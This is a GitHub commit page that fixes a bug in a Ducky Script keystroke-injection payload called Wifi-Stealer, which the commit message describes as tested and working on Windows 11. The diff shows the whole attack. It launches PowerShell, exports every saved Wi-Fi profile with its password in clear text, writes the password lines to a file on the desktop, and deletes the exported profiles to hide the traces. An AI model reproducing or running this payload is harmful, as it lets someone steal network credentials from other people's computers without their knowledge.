Updated Wifi-Stealer_ORG.txt

When outputting the file it saves as Wifi not Wi-Fi- and does not output to 0.txt, simply removing the dash - between Wifi makes this then work as intended. Tested and working on Windows 11.
This commit is contained in:
amec0e
2022-08-06 20:32:27 +01:00
committed by GitHub
parent 945362d3a8
commit 9e052a9d72
+1 -1
View File
@@ -9,5 +9,5 @@ DELAY 500
STRING powershell
ENTER
DELAY 500
STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path Wi-Fi-* -Pattern 'keyMaterial'>0.txt;del Wi-Fi-*;exit
STRING cd C:\Users\$env:UserName\Desktop;netsh wlan export profile key=clear;Select-String -Path WiFi-* -Pattern 'keyMaterial'>0.txt;del WiFi-*;exit
ENTER